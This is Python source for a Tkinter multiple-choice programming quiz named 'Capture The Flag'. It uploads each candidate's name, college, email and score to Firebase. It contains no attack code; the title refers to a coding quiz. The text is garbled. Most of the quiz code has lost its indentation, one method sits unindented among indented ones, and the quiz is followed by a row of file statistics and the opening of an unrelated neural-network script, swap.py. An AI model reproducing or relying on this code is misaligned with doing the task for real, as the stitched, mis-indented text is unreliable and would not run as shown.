self.secondwin = Toplevel()
self.secondwin.geometry('%dx%d+%d+%d' % (w, h, x, y))
self.frame1 = Frame(self.secondwin,width=1000, height=600, bg='black')
self.frame1.pack()
self.event = Label(self.secondwin, text="Capture The Flag", font=('arial 30 bold'), fg='black', bg='lightgreen')
self.event.place(x=300, y=20)
self.q1 = Image.open("images/q1-small.png")
self.render = ImageTk.PhotoImage(self.q1)
self.img = Label(self.secondwin, image=self.render)
self.img.image = self.render
self.img.place(x=50, y=100)
def q1():
global ans,crtans
ans = str(var.get())
if ans == answer1:
crtans = crtans+1
#Question 1
var = IntVar()
self.R1 = Radiobutton(self.secondwin, text="A) 6, 10, 8 ", variable=var, value=1,bg='lightgreen',
command=q1)
self.R1.place(x=500,y=100)
self.R2 = Radiobutton(self.secondwin, text="B) 4, 8, 4", variable=var, value=2,bg='lightgreen',
command=q1)
self.R2.place(x=500,y=150)
self.R3 = Radiobutton(self.secondwin, text="C) 2, 4, 4", variable=var, value=3,bg='lightgreen',
command=q1)
self.R3.place(x=500,y=200)
self.R4 = Radiobutton(self.secondwin, text="D) 2, 8, 4", variable=var, value=4,bg='lightgreen',
command=q1)
self.R4.place(x=500,y=250)
self.q2 = Image.open("images/q2-small.png")
self.render = ImageTk.PhotoImage(self.q2)
self.img = Label(self.secondwin, image=self.render)
self.img.image = self.render
self.img.place(x=50, y=350)
'''self.q2 = Label(self.secondwin, text="2)How to declare a variable?", font=('arial 15'), fg='black',
bg='lightgreen')
self.q2.place(x=20, y=300)'''
def q2():
global ans1,crtans
ans1 = str(var1.get())
print(ans1)
if ans1 == answer2:
crtans = crtans+1
#Question 2
var1 = IntVar()
self.R5 = Radiobutton(self.secondwin, text="A) 101010", variable=var1, value=1,bg='lightgreen',
command=q2)
self.R5.place(x=500,y=350)
self.R6 = Radiobutton(self.secondwin, text="B) 0xxa5f1010", variable=var1, value=2,bg='lightgreen',
command=q2)
self.R6.place(x=500,y=400)
self.R7 = Radiobutton(self.secondwin, text="C) Run time error", variable=var1, value=3,bg='lightgreen',
command=q2)
self.R7.place(x=500,y=450)
self.R8 = Radiobutton(self.secondwin, text="D) No Output", variable=var1, value=4,bg='lightgreen',
command=q2)
self.R8.place(x=500,y=500)
self.secondnext = Button(self.secondwin,width=10,text="NEXT",command = self.secondnext)
self.secondnext.place(x=800,y=550)
self.secondback = Button(self.secondwin,width=10,text="BACK",command = self.secondback)
self.secondback.place(x=700,y=550)
self.secondwin.withdraw()
self.thirdwin = Toplevel()
self.thirdwin.geometry('%dx%d+%d+%d' % (w, h, x, y))
self.frame2 = Frame(self.thirdwin,width=1000, height=600, bg='black')
self.frame2.pack()
self.q3 = Image.open("images/q3-small.png")
self.render = ImageTk.PhotoImage(self.q3)
self.img = Label(self.thirdwin, image=self.render)
self.img.image = self.render
self.img.place(x=50, y=100)
def q3():
global ans2,crtans
ans2 = str(var2.get())
if ans2 == answer3:
crtans = crtans+1
#Question 3
var2 = IntVar()
self.R9 = Radiobutton(self.thirdwin, text="A) 0", variable=var2, value=1,bg='lightgreen',
command=q3)
self.R9.place(x=500,y=100)
self.R10 = Radiobutton(self.thirdwin, text="B) Error because of incorrect line-1 only.", variable=var2, value=2,bg='lightgreen',
command=q3)
self.R10.place(x=500,y=150)
self.R11 = Radiobutton(self.thirdwin, text="C) Error because of incorrect line-1 and line-2.", variable=var2, value=3,bg='lightgreen',
command=q3)
self.R11.place(x=500,y=200)
self.R12 = Radiobutton(self.thirdwin, text="D) Error because of incorrect line-2 only.", variable=var2, value=4,bg='lightgreen',
command=q3)
self.R12.place(x=500,y=250)
self.q4 = Image.open("images/q4-small.png")
self.render = ImageTk.PhotoImage(self.q4)
self.img = Label(self.thirdwin, image=self.render)
self.img.image = self.render
self.img.place(x=50, y=350)
'''self.q2 = Label(self.secondwin, text="2)How to declare a variable?", font=('arial 15'), fg='black',
bg='lightgreen')
self.q2.place(x=20, y=300)'''
def q4():
global ans3,crtans
ans3 = str(var3.get())
print(ans3)
if ans3 == answer4:
crtans = crtans+1
#Question 4
var3 = IntVar()
self.R13 = Radiobutton(self.thirdwin, text="A) 0", variable=var3, value=1,bg='lightgreen',
command=q4)
self.R13.place(x=500,y=350)
self.R14 = Radiobutton(self.thirdwin, text="B) Runtime error", variable=var3, value=2,bg='lightgreen',
command=q4)
self.R14.place(x=500,y=400)
self.R15 = Radiobutton(self.thirdwin, text="C) 5", variable=var3, value=3,bg='lightgreen',
command=q4)
self.R15.place(x=500,y=450)
self.R16 = Radiobutton(self.thirdwin, text="D) compilation error", variable=var3, value=4,bg='lightgreen',
command=q4)
self.R16.place(x=500,y=500)
self.thirdnext = Button(self.thirdwin,width=10,text="NEXT",command = self.thirdnext)
self.thirdnext.place(x=800,y=550)
self.thirdback = Button(self.thirdwin,width=10,text="BACK",command = self.thirdback)
self.thirdback.place(x=700,y=550)
self.thirdwin.withdraw()
self.forthwin = Toplevel()
self.forthwin.geometry('%dx%d+%d+%d' % (w, h, x, y))
self.frame3 = Frame(self.forthwin,width=1000, height=600, bg='black')
self.frame3.pack()
self.q5 = Image.open("images/q5-small.png")
self.render = ImageTk.PhotoImage(self.q5)
self.img = Label(self.forthwin, image=self.render)
self.img.image = self.render
self.img.place(x=50, y=100)
def q5():
global ans4,crtans
ans4 = str(var4.get())
print(ans4)
if ans4 == answer5:
crtans = crtans+1
#Question 5
var4 = IntVar()
self.R17 = Radiobutton(self.forthwin, text="A) address address value", variable=var4, value=1,bg='lightgreen',
command=q5)
self.R17.place(x=500,y=100)
self.R18 = Radiobutton(self.forthwin, text="B) address value value", variable=var4, value=2,bg='lightgreen',
command=q5)
self.R18.place(x=500,y=150)
self.R19 = Radiobutton(self.forthwin, text="C) address address address", variable=var4, value=3,bg='lightgreen',
command=q5)
self.R19.place(x=500,y=200)
self.R20 = Radiobutton(self.forthwin, text="D) compilation error", variable=var4, value=4,bg='lightgreen',
command=q5)
self.R20.place(x=500,y=250)
self.q6 = Image.open("images/q6-small.png")
self.render = ImageTk.PhotoImage(self.q6)
self.img = Label(self.forthwin, image=self.render)
self.img.image = self.render
self.img.place(x=50, y=350)
def q6():
global ans5,crtans
ans5 = str(var5.get())
print(ans5)
if ans5 == answer6:
crtans = crtans+1
#Question 6
var5 = IntVar()
self.R21 = Radiobutton(self.forthwin, text="A) No output", variable=var5, value=1,bg='lightgreen',
command=q6)
self.R21.place(x=500,y=350)
self.R22 = Radiobutton(self.forthwin, text="B) compile time error", variable=var5, value=2,bg='lightgreen',
command=q6)
self.R22.place(x=500,y=400)
self.R23 = Radiobutton(self.forthwin, text="C) 1", variable=var5, value=3,bg='lightgreen',
command=q6)
self.R23.place(x=500,y=450)
self.R24 = Radiobutton(self.forthwin, text="D) 4", variable=var5, value=4,bg='lightgreen',
command=q6)
self.R24.place(x=500,y=500)
self.forthnext = Button(self.forthwin,width=10,text="NEXT",command = self.forthnext)
self.forthnext.place(x=800,y=550)
self.forthback = Button(self.forthwin,width=10,text="BACK",command = self.forthback)
self.forthback.place(x=700,y=550)
self.forthwin.withdraw()
self.fifthwin = Toplevel()
self.fifthwin.geometry('%dx%d+%d+%d' % (w, h, x, y))
self.frame3 = Frame(self.fifthwin,width=1000, height=600, bg='black')
self.frame3.pack()
self.q7 = Image.open("images/q7-small.png")
self.render = ImageTk.PhotoImage(self.q7)
self.img = Label(self.fifthwin, image=self.render)
self.img.image = self.render
self.img.place(x=50, y=100)
def q7():
global ans6,crtans
ans6 = str(var6.get())
print(ans6)
if ans6 == answer7:
crtans = crtans+1
#Question 7
var6 = IntVar()
self.R25 = Radiobutton(self.fifthwin, text="A) The control won’t fall into the for loop", variable=var6, value=1,bg='lightgreen',
command=q7)
self.R25.place(x=500,y=100)
self.R26 = Radiobutton(self.fifthwin, text="B) Numbers will be displayed until the signed limit of short and throw a run time error", variable=var6, value=2,bg='lightgreen',
command=q7)
self.R26.place(x=500,y=150)
self.R27 = Radiobutton(self.fifthwin, text="C) ) Numbers will be displayed until the signed limit of short and program will \nsuccessfully terminate", variable=var6, value=3,bg='lightgreen',
command=q7)
self.R27.place(x=500,y=200)
self.R28 = Radiobutton(self.fifthwin, text="D) This program will get into an infinite loop and keep printing numbers with no errors", variable=var6, value=4,bg='lightgreen',
command=q7)
self.R28.place(x=500,y=250)
self.q8 = Image.open("images/q8-small.png")
self.render = ImageTk.PhotoImage(self.q8)
self.img = Label(self.fifthwin, image=self.render)
self.img.image = self.render
self.img.place(x=50, y=350)
def q8():
global ans7,crtans
ans7 = str(var7.get())
print(ans7)
if ans7 == answer8:
crtans = crtans+1
#Question 8
var7 = IntVar()
self.R21 = Radiobutton(self.fifthwin, text="A) 0.000000 1.000000 2.000000", variable=var7, value=1,bg='lightgreen',
command=q8)
self.R21.place(x=500,y=350)
self.R22 = Radiobutton(self.fifthwin, text="B) 2.000000", variable=var7, value=2,bg='lightgreen',
command=q8)
self.R22.place(x=500,y=400)
self.R23 = Radiobutton(self.fifthwin, text="C) Compile time error", variable=var7, value=3,bg='lightgreen',
command=q8)
self.R23.place(x=500,y=450)
self.R24 = Radiobutton(self.fifthwin, text="D) 3.000000", variable=var7, value=4,bg='lightgreen',
command=q8)
self.R24.place(x=500,y=500)
self.fifthnext = Button(self.fifthwin,width=10,text="NEXT",command = self.fifthnext)
self.fifthnext.place(x=800,y=550)
self.fifthback = Button(self.fifthwin,width=10,text="BACK",command = self.fifthback)
self.fifthback.place(x=700,y=550)
self.fifthwin.withdraw()
self.sixthwin = Toplevel()
self.sixthwin.geometry('%dx%d+%d+%d' % (w, h, x, y))
self.frame4 = Frame(self.sixthwin,width=1000, height=600, bg='black')
self.frame4.pack()
self.q9 = Image.open("images/q9-small.png")
self.render = ImageTk.PhotoImage(self.q9)
self.img = Label(self.sixthwin, image=self.render)
self.img.image = self.render
self.img.place(x=50, y=100)
def q9():
global ans8,crtans
ans8 = str(var8.get())
print(ans8)
if ans8 == answer9:
crtans = crtans+1
#Question 9
var8 = IntVar()
self.R29 = Radiobutton(self.sixthwin, text="A) 5", variable=var8, value=1,bg='lightgreen',
command=q9)
self.R29.place(x=500,y=100)
self.R30 = Radiobutton(self.sixthwin, text="B) 0", variable=var8, value=2,bg='lightgreen',
command=q9)
self.R30.place(x=500,y=150)
self.R31 = Radiobutton(self.sixthwin, text="C) Syntax Error", variable=var8, value=3,bg='lightgreen',
command=q9)
self.R31.place(x=500,y=200)
self.R32 = Radiobutton(self.sixthwin, text="D) 05", variable=var8, value=4,bg='lightgreen',
command=q9)
self.R32.place(x=500,y=250)
self.q10 = Image.open("images/q10-small.png")
self.render = ImageTk.PhotoImage(self.q10)
self.img = Label(self.sixthwin, image=self.render)
self.img.image = self.render
self.img.place(x=50, y=350)
def q10():
global ans9,crtans
ans9 = str(var9.get())
print(ans9)
if ans9 == answer10:
crtans = crtans+1
#Question 10
var9 = IntVar()
self.R33 = Radiobutton(self.sixthwin, text="A) 11 33", variable=var9, value=1,bg='lightgreen',
command=q10)
self.R33.place(x=500,y=350)
self.R34 = Radiobutton(self.sixthwin, text="B) Error", variable=var9, value=2,bg='lightgreen',
command=q10)
self.R34.place(x=500,y=400)
self.R35 = Radiobutton(self.sixthwin, text="C) exception", variable=var9, value=3,bg='lightgreen',
command=q10)
self.R35.place(x=500,y=450)
self.R36 = Radiobutton(self.sixthwin, text="D) 11 -33", variable=var9, value=4,bg='lightgreen',
command=q10)
self.R36.place(x=500,y=500)
self.fifthnext = Button(self.sixthwin,width=10,text="NEXT",command = self.sixthnext)
self.fifthnext.place(x=800,y=550)
self.sixthback = Button(self.sixthwin,width=10,text="BACK",command = self.sixthback)
self.sixthback.place(x=700,y=550)
self.sixthwin.withdraw()
self.seventhwin = Toplevel()
self.seventhwin.geometry('%dx%d+%d+%d' % (w, h, x, y))
self.frame5 = Frame(self.seventhwin,width=1000, height=600, bg='black')
self.frame5.pack()
self.q11 = Image.open("images/q11-small.png")
self.render = ImageTk.PhotoImage(self.q11)
self.img = Label(self.seventhwin, image=self.render)
self.img.image = self.render
self.img.place(x=50, y=100)
def q11():
global ans10,crtans
ans10 = str(var10.get())
print(ans10)
if ans10 == answer11:
crtans = crtans+1
#Question 11
var10 = IntVar()
self.R37 = Radiobutton(self.seventhwin, text="A) Garbage value", variable=var10, value=1,bg='lightgreen',
command=q11)
self.R37.place(x=500,y=100)
self.R38 = Radiobutton(self.seventhwin, text="B) 1", variable=var10, value=2,bg='lightgreen',
command=q11)
self.R38.place(x=500,y=150)
self.R39 = Radiobutton(self.seventhwin, text="C) 0", variable=var10, value=3,bg='lightgreen',
command=q11)
self.R39.place(x=500,y=200)
self.R40 = Radiobutton(self.seventhwin, text="D) Error", variable=var10, value=4,bg='lightgreen',
command=q11)
self.R40.place(x=500,y=250)
self.q12 = Image.open("images/q12-small.png")
self.render = ImageTk.PhotoImage(self.q12)
self.img = Label(self.seventhwin, image=self.render)
self.img.image = self.render
self.img.place(x=50, y=350)
def q12():
global ans11,crtans
ans11 = str(var11.get())
print(ans11)
if ans11 == answer12:
crtans = crtans+1
#Question 12
var11 = IntVar()
self.R41 = Radiobutton(self.seventhwin, text="A) 5", variable=var11, value=1,bg='lightgreen',
command=q12)
self.R41.place(x=500,y=350)
self.R42 = Radiobutton(self.seventhwin, text="B) 6", variable=var11, value=2,bg='lightgreen',
command=q12)
self.R42.place(x=500,y=400)
self.R43 = Radiobutton(self.seventhwin, text="C) 14", variable=var11, value=3,bg='lightgreen',
command=q12)
self.R43.place(x=500,y=450)
self.R44 = Radiobutton(self.seventhwin, text="D) Compilation Error", variable=var11, value=4,bg='lightgreen',
command=q12)
self.R44.place(x=500,y=500)
self.seventhnext = Button(self.seventhwin,width=10,text="NEXT",command = self.seventhnext)
self.seventhnext.place(x=800,y=550)
self.seventhback = Button(self.seventhwin,width=10,text="BACK",command = self.seventhback)
self.seventhback.place(x=700,y=550)
self.seventhwin.withdraw()
#----------------------------------------------------------------------#
self.eighthwin = Toplevel()
self.eighthwin.geometry('%dx%d+%d+%d' % (w, h, x, y))
self.frame6 = Frame(self.eighthwin,width=1000, height=600, bg='black')
self.frame6.pack()
self.q13 = Image.open("images/q13-small.png")
self.render = ImageTk.PhotoImage(self.q13)
self.img = Label(self.eighthwin, image=self.render)
self.img.image = self.render
self.img.place(x=50, y=100)
def q13():
global ans12,crtans
ans12 = str(var12.get())
print(ans12)
if ans12 == answer13:
crtans = crtans+1
#Question 13
var12 = IntVar()
self.R45 = Radiobutton(self.eighthwin, text="A) The program has a compile error because the size of the array \nwasn’t specified when declaring the array.", variable=var12, value=1,bg='lightgreen',
command=q13)
self.R45.place(x=500,y=100)
self.R46 = Radiobutton(self.eighthwin, text="B) The program has a runtime error because the array elements are not initialized.", variable=var12, value=2,bg='lightgreen',
command=q13)
self.R46.place(x=500,y=150)
self.R47 = Radiobutton(self.eighthwin, text="C) The program runs fine and displays x[0] is 0.", variable=var12, value=3,bg='lightgreen',
command=q13)
self.R47.place(x=500,y=200)
self.R48 = Radiobutton(self.eighthwin, text="D) The program has a runtime error because the array element x[0] is not defined.", variable=var12, value=4,bg='lightgreen',
command=q13)
self.R48.place(x=500,y=250)
self.q14 = Image.open("images/q14-small.png")
self.render = ImageTk.PhotoImage(self.q14)
self.img = Label(self.eighthwin, image=self.render)
self.img.image = self.render
self.img.place(x=50, y=350)
def q14():
global ans13,crtans
ans13 = str(var13.get())
print(ans13)
if ans13 == answer14:
crtans = crtans+1
#Question 14
var13 = IntVar()
self.R49 = Radiobutton(self.eighthwin, text="A) 0", variable=var13, value=1,bg='lightgreen',
command=q14)
self.R49.place(x=500,y=350)
self.R50 = Radiobutton(self.eighthwin, text="B) 5", variable=var13, value=2,bg='lightgreen',
command=q14)
self.R50.place(x=500,y=400)
self.R51 = Radiobutton(self.eighthwin, text="C) Exception is thrown", variable=var13, value=3,bg='lightgreen',
command=q14)
self.R51.place(x=500,y=450)
self.R52 = Radiobutton(self.eighthwin, text="D) Returns the index of “Hari”", variable=var13, value=4,bg='lightgreen',
command=q14)
self.R52.place(x=500,y=500)
self.eighthnext = Button(self.eighthwin,width=10,text="NEXT",command = self.eighthnext)
self.eighthnext.place(x=800,y=550)
self.eighthback = Button(self.eighthwin,width=10,text="BACK",command = self.eighthback)
self.eighthback.place(x=700,y=550)
self.eighthwin.withdraw()
#=======================================================================================#
self.ninthwin = Toplevel()
self.ninthwin.geometry('%dx%d+%d+%d' % (w, h, x, y))
self.frame7 = Frame(self.ninthwin,width=1000, height=600, bg='black')
self.frame7.pack()
self.q15 = Image.open("images/q15-small.png")
self.render = ImageTk.PhotoImage(self.q15)
self.img = Label(self.ninthwin, image=self.render)
self.img.image = self.render
self.img.place(x=50, y=100)
def q15():
global ans14,crtans
ans14 = str(var14.get())
print(ans14)
if ans14 == answer15:
crtans = crtans+1
#Question 15
var14 = IntVar()
self.R53 = Radiobutton(self.ninthwin, text="A) 123", variable=var14, value=1,bg='lightgreen',
command=q15)
self.R53.place(x=500,y=100)
self.R54 = Radiobutton(self.ninthwin, text="B) 1", variable=var14, value=2,bg='lightgreen',
command=q15)
self.R54.place(x=500,y=150)
self.R55 = Radiobutton(self.ninthwin, text="C) Error", variable=var14, value=3,bg='lightgreen',
command=q15)
self.R55.place(x=500,y=200)
self.R56 = Radiobutton(self.ninthwin, text="D) 1 2 3", variable=var14, value=4,bg='lightgreen',
command=q15)
self.R56.place(x=500,y=250)
self.q16 = Image.open("images/q16-small.png")
self.render = ImageTk.PhotoImage(self.q16)
self.img = Label(self.ninthwin, image=self.render)
self.img.image = self.render
self.img.place(x=50, y=350)
def q16():
global ans15,crtans
ans15 = str(var15.get())
print(ans15)
if ans15 == answer16:
crtans = crtans+1
#Question 16
var15 = IntVar()
self.R57 = Radiobutton(self.ninthwin, text="A) Cybertron", variable=var15, value=1,bg='lightgreen',
command=q16)
self.R57.place(x=500,y=350)
self.R58 = Radiobutton(self.ninthwin, text="B) CYBERTRON", variable=var15, value=2,bg='lightgreen',
command=q16)
self.R58.place(x=500,y=400)
self.R59 = Radiobutton(self.ninthwin, text="C) False", variable=var15, value=3,bg='lightgreen',
command=q16)
self.R59.place(x=500,y=450)
self.R60 = Radiobutton(self.ninthwin, text="D) True", variable=var15, value=4,bg='lightgreen',
command=q16)
self.R60.place(x=500,y=500)
self.ninthnext = Button(self.ninthwin,width=10,text="NEXT",command = self.ninthnext)
self.ninthnext.place(x=800,y=550)
self.ninthback = Button(self.ninthwin,width=10,text="BACK",command = self.ninthback)
self.ninthback.place(x=700,y=550)
self.ninthwin.withdraw()
#______________________________________________________________________________________________#
self.tenthwin = Toplevel()
self.tenthwin.geometry('%dx%d+%d+%d' % (w, h, x, y))
self.frame8 = Frame(self.tenthwin,width=1000, height=600, bg='black')
self.frame8.pack()
self.q17 = Image.open("images/q17-small.png")
self.render = ImageTk.PhotoImage(self.q17)
self.img = Label(self.tenthwin, image=self.render)
self.img.image = self.render
self.img.place(x=50, y=100)
def q17():
global ans16,crtans
ans16 = str(var16.get())
print(ans16)
if ans16 == answer17:
crtans = crtans+1
#Question 17
var16 = IntVar()
self.R61 = Radiobutton(self.tenthwin, text="A) Type Error: can only concatenate list (not “int”) to list", variable=var16, value=1,bg='lightgreen',
command=q17)
self.R61.place(x=500,y=100)
self.R62 = Radiobutton(self.tenthwin, text="B) 11", variable=var16, value=2,bg='lightgreen',
command=q17)
self.R62.place(x=500,y=150)
self.R63 = Radiobutton(self.tenthwin, text="C) 12", variable=var16, value=3,bg='lightgreen',
command=q17)
self.R63.place(x=500,y=200)
self.R64 = Radiobutton(self.tenthwin, text="D) 38", variable=var16, value=4,bg='lightgreen',
command=q17)
self.R64.place(x=500,y=250)
self.q18 = Image.open("images/q18-small.png")
self.render = ImageTk.PhotoImage(self.q18)
self.img = Label(self.tenthwin, image=self.render)
self.img.image = self.render
self.img.place(x=50, y=350)
def q18():
global ans17,crtans
ans17 = str(var17.get())
print(ans17)
if ans17 == answer18:
crtans = crtans+1
#Question 18
var17 = IntVar()
self.R65 = Radiobutton(self.tenthwin, text="A) [5, 2, 3, 4] [5, 2, 3, 4] [1, 2, 3, 4] [1, 2, 3, 4]", variable=var17, value=1,bg='lightgreen',
command=q18)
self.R65.place(x=500,y=350)
self.R66 = Radiobutton(self.tenthwin, text="B) [[5], 2, 3, 4] [[5], 2, 3, 4] [[5], 2, 3, 4] [1, 2, 3, 4]", variable=var17, value=2,bg='lightgreen',
command=q18)
self.R66.place(x=500,y=400)
self.R67 = Radiobutton(self.tenthwin, text="C) [5, 2, 3, 4] [5, 2, 3, 4] [5, 2, 3, 4] [1, 2, 3, 4]", variable=var17, value=3,bg='lightgreen',
command=q18)
self.R67.place(x=500,y=450)
self.R68 = Radiobutton(self.tenthwin, text="D) [[5], 2, 3, 4] [[5], 2, 3, 4] [1, 2, 3, 4] [1, 2, 3, 4]", variable=var17, value=4,bg='lightgreen',
command=q18)
self.R68.place(x=500,y=500)
self.tenthnext = Button(self.tenthwin,width=10,text="NEXT",command = self.tenthnext)
self.tenthnext.place(x=800,y=550)
self.tenthback = Button(self.tenthwin,width=10,text="BACK",command = self.tenthback)
self.tenthback.place(x=700,y=550)
self.tenthwin.withdraw()
#____________________________________________---------------------------------------------#
self.lastwin = Toplevel()
self.lastwin.geometry('%dx%d+%d+%d' % (w, h, x, y))
self.frame9 = Frame(self.lastwin,width=1000, height=600, bg='black')
self.frame9.pack()
self.q19 = Image.open("images/q19-small.png")
self.render = ImageTk.PhotoImage(self.q19)
self.img = Label(self.lastwin, image=self.render)
self.img.image = self.render
self.img.place(x=50, y=100)
def q19():
global ans18,crtans
ans18 = str(var18.get())
print(ans18)
if ans18 == answer19:
crtans = crtans+1
#Question 19
var18 = IntVar()
self.R69 = Radiobutton(self.lastwin, text="A) KeyError", variable=var18, value=1,bg='lightgreen',
command=q19)
self.R69.place(x=500,y=100)
self.R70 = Radiobutton(self.lastwin, text="B) {0: 1, 7: 0, 1: 1, 8: 0}", variable=var18, value=2,bg='lightgreen',
command=q19)
self.R70.place(x=500,y=150)
self.R71 = Radiobutton(self.lastwin, text="C) {0: 0, 7: 0, 1: 1, 8: 1}", variable=var18, value=3,bg='lightgreen',
command=q19)
self.R71.place(x=500,y=200)
self.R72 = Radiobutton(self.lastwin, text="D) {1: 1, 7: 2, 0: 1, 8: 1}", variable=var18, value=4,bg='lightgreen',
command=q19)
self.R72.place(x=500,y=250)
self.q20 = Image.open("images/q20-small.png")
self.render = ImageTk.PhotoImage(self.q20)
self.img = Label(self.lastwin, image=self.render)
self.img.image = self.render
self.img.place(x=50, y=350)
def q20():
global ans19,crtans
ans19 = str(var19.get())
print(ans19)
if ans19 == answer20:
crtans = crtans+1
#Question 20
var19 = IntVar()
self.R73 = Radiobutton(self.lastwin, text="A) 100", variable=var19, value=1,bg='lightgreen',
command=q20)
self.R73.place(x=500,y=350)
self.R74 = Radiobutton(self.lastwin, text="B) Compilation error", variable=var19, value=2,bg='lightgreen',
command=q20)
self.R74.place(x=500,y=400)
self.R75 = Radiobutton(self.lastwin, text="C) Runtime error", variable=var19, value=3,bg='lightgreen',
command=q20)
self.R75.place(x=500,y=450)
self.R76 = Radiobutton(self.lastwin, text="D) None of these", variable=var19, value=4,bg='lightgreen',
command=q20)
self.R76.place(x=500,y=500)
self.save = Button(self.lastwin,width=10,text="Save",command = self.save)
self.save.place(x=800,y=550)
self.lastback = Button(self.lastwin,width=10,text="BACK",command = self.lastback)
self.lastback.place(x=700,y=550)
self.lastwin.withdraw()
    def save(self):
        """Collect the candidate's details, upload them with the score, then grade.

        Reads the name/college/mail entry widgets, posts the record (including
        the global correct-answer count ``crtans``) to Firebase via ``fbconn``,
        disables the Save button so it cannot be pressed twice, and calls
        ``answer()`` to build the per-question result list.

        NOTE(review): at this point ``self.save`` is the Save *Button* widget
        (the attribute assigned in the UI builder shadows this method on the
        instance), so ``self.save.config`` below targets the widget — confirm.
        """
        print("Done")
        self.name = self.nameentry.get()
        self.clg = self.clgentry.get()
        self.mail = self.mailentry.get()
        data_to_upload = {'Name' : self.name,
                          'College' : self.clg,
                          'Mail' : self.mail,
                          'Correct' : crtans}  # crtans: global tally updated by the q*() callbacks
        # fbconn is created outside this view — presumably a Firebase connection; verify.
        result = fbconn.post('/candidate/',data_to_upload)
        self.save.config(state="disabled")
        self.answer()
    def answer(self):
        """Append per-question correctness flags ('1'/'0') to the global anslist.

        NOTE(review): only questions 1 and 2 (answer1/ans, answer2/ans1) are
        checked even though the quiz has 20 questions — this looks incomplete;
        confirm against the rest of the file.
        """
        if answer1==ans:
            anslist.append('1')
        else:
            anslist.append('0')
        if answer2==ans1:
            anslist.append('1')
        else:
            anslist.append('0')
        print(anslist)
    def start(self):
        """Hide the intro (root) window and show the first question window."""
        self.master.withdraw()
        self.secondwin.deiconify()
    def secondnext(self):
        """Advance from the second window to the third."""
        print("Done")
        self.secondwin.withdraw()
        self.thirdwin.deiconify()
    def thirdnext(self):
        """Advance from the third window to the fourth."""
        print("Third Next")
        self.thirdwin.withdraw()
        self.forthwin.deiconify()
    def forthnext(self):
        """Advance from the fourth window to the fifth."""
        print("Forth Next")
        self.forthwin.withdraw()
        self.fifthwin.deiconify()
    def fifthnext(self):
        """Advance from the fifth window to the sixth."""
        print("Fifth Next")
        self.fifthwin.withdraw()
        self.sixthwin.deiconify()
    def sixthnext(self):
        """Advance from the sixth window to the seventh."""
        print("Sixth Next")
        self.sixthwin.withdraw()
        self.seventhwin.deiconify()
    def seventhnext(self):
        """Advance from the seventh window to the eighth."""
        print("Seventh Next")
        self.seventhwin.withdraw()
        self.eighthwin.deiconify()
    def eighthnext(self):
        """Advance from the eighth window to the ninth."""
        print("Eighth Next")
        self.eighthwin.withdraw()
        self.ninthwin.deiconify()
    def ninthnext(self):
        """Advance from the ninth window to the tenth."""
        print("Ninth Next")
        self.ninthwin.withdraw()
        self.tenthwin.deiconify()
def tenthnext(self):
print("Tentn Next")
self.tenthwin.withdraw()
self.lastwin.deiconify()
    def lastnext(self):
        """Placeholder for a NEXT action on the last window.

        NOTE(review): the last window wires a Save button instead of NEXT,
        so this method appears unused — confirm before removing.
        """
        print("Last Next")
    def secondback(self):
        """Return from the second window to the intro (root) window."""
        print("Back")
        self.secondwin.withdraw()
        self.master.deiconify()
    def thirdback(self):
        """Return from the third window to the second."""
        self.thirdwin.withdraw()
        self.secondwin.deiconify()
    def forthback(self):
        """Return from the fourth window to the third."""
        self.forthwin.withdraw()
        self.thirdwin.deiconify()
    def fifthback(self):
        """Return from the fifth window to the fourth."""
        self.fifthwin.withdraw()
        self.forthwin.deiconify()
    def sixthback(self):
        """Return from the sixth window to the fifth."""
        self.sixthwin.withdraw()
        self.fifthwin.deiconify()
    def seventhback(self):
        """Return from the seventh window to the sixth."""
        self.seventhwin.withdraw()
        self.sixthwin.deiconify()
    def eighthback(self):
        """Return from the eighth window to the seventh."""
        self.eighthwin.withdraw()
        self.seventhwin.deiconify()
    def ninthback(self):
        """Return from the ninth window to the eighth."""
        self.ninthwin.withdraw()
        self.eighthwin.deiconify()
    def tenthback(self):
        """Return from the tenth window to the ninth."""
        self.tenthwin.withdraw()
        self.ninthwin.deiconify()
    def lastback(self):
        """Return from the last window to the tenth."""
        self.lastwin.withdraw()
        self.tenthwin.deiconify()
# Script entry: build the quiz UI and run the Tk event loop.
root = Tk()
obj = FirstRound(root)
# w, h, x, y are screen-geometry values defined earlier in the file — TODO confirm
root.geometry('%dx%d+%d+%d' % (w, h, x, y))
root.mainloop()
| 37.853583 | 206 | 0.555373 | 4,576 | 36,453 | 4.391827 | 0.097028 | 0.039409 | 0.075633 | 0.039807 | 0.627457 | 0.341942 | 0.215704 | 0.157038 | 0.147435 | 0.133254 | 0 | 0.086289 | 0.297726 | 36,453 | 962 | 207 | 37.892931 | 0.69875 | 0.016213 | 0 | 0.313187 | 0 | 0.006868 | 0.108442 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.06044 | false | 0 | 0.004121 | 0 | 0.065934 | 0.04533 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41a9d57be733f7ec06133940f72c9adc60cb07fd | 2,491 | py | Python | swap.py | garrettkatz/ghu | 2bf25ac6f8e82d3e7231c3381f7a4946db6dc59f | [
"MIT"
] | null | null | null | swap.py | garrettkatz/ghu | 2bf25ac6f8e82d3e7231c3381f7a4946db6dc59f | [
"MIT"
] | null | null | null | swap.py | garrettkatz/ghu | 2bf25ac6f8e82d3e7231c3381f7a4946db6dc59f | [
"MIT"
] | null | null | null | """
Swap input (rinp) on output (rout) with one extra registers (rtmp)
"""
import numpy as np
import torch as tr
import matplotlib.pyplot as pt
from ghu import *
from codec import Codec
from controller import Controller
from lvd import lvd
from reinforce import reinforce
if __name__ == "__main__":
    print("*******************************************************")

    # Configuration
    num_symbols = 4
    layer_sizes = {"rinp": 64, "rout":64, "rtmp": 64}  # register name -> layer width
    hidden_size = 32
    rho = .99        # passed to Codec as rho — presumably a scaling/radius parameter; confirm in Codec
    plastic = []     # no plastic pathways for this task
    num_episodes = 1000

    # Setup GHU
    symbols = [str(a) for a in range(num_symbols)]
    pathways, associations = default_initializer( # all to all
        layer_sizes.keys(), symbols)
    codec = Codec(layer_sizes, symbols, rho=rho)
    controller = Controller(layer_sizes, pathways, hidden_size, plastic)
    ghu = GatedHebbianUnit(
        layer_sizes, pathways, controller, codec,
        batch_size = num_episodes, plastic = plastic)
    ghu.associate(associations)

    # Initialize layers
